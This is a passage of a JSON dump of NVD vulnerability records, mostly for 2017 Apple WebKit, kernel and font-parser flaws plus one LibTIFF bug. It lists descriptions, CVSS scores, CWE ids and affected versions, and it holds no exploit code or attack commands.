affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted elements on a web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-2493", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2493"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-2493", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2493", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T15:48:53", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"FontParser\" component. It allows remote attackers to obtain sensitive information or cause a denial of service (out-of-bounds read and application crash) via a crafted font file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2439", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2439"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2439", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2439", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:50:54", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2476", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2476"], "modified": "2019-03-25T17:15:00", "cpe": [], "id": "CVE-2017-2476", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2476", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T15:49:57", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2468", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2468"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1", "cpe:/a:apple:safari:10.0.3"], "id": "CVE-2017-2468", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2468", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:51:45", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Security\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted X.509 certificate file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2485", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2485"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2485", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2485", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:51:51", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"FontParser\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted font file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2487", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2487"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2487", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2487", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:48:57", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"libc++abi\" component. A use-after-free vulnerability allows remote attackers to execute arbitrary code via a crafted C++ app that is mishandled during demangling.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2441", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2441"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2441", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2441", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:32:26", "description": "The DumpModeEncode function in tif_dumpmode.c in the bmp2tiff tool in LibTIFF 4.0.6 and earlier, when the \"-c none\" option is used, allows remote attackers to cause a denial of service (buffer over-read) via a crafted BMP image.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-10-03T16:09:00", "type": "cve", "title": "CVE-2016-3619", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619"], "modified": "2017-09-03T01:29:00", "cpe": ["cpe:/a:libtiff:libtiff:4.0.6"], "id": "CVE-2016-3619", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3619", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:libtiff:libtiff:4.0.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:51:21", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2480", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2480"], "modified": "2017-08-16T01:29:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/a:apple:itunes:12.5.5.5", "cpe:/a:apple:icloud:6.1.1", "cpe:/a:apple:safari:10.0.3"], "id": "CVE-2017-2480", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2480", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:apple:itunes:12.5.5.5:*:*:*:*:windows:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:icloud:6.1.1:*:*:*:*:windows:*:*"]}, {"lastseen": "2022-03-23T15:51:16", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via crafted use of frames on a web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2475", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2475"], "modified": "2019-03-25T17:15:00", "cpe": [], "id": "CVE-2017-2475", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2475", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T15:49:54", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"ImageIO\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2467", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2467"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2467", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2467", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:46:30", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2401", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2401"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2401", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2401", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:45:45", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Carbon\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted .dfont file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2379", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2379"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2379", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:52:02", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2490", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2490"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2490", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2490", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:46:13", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": 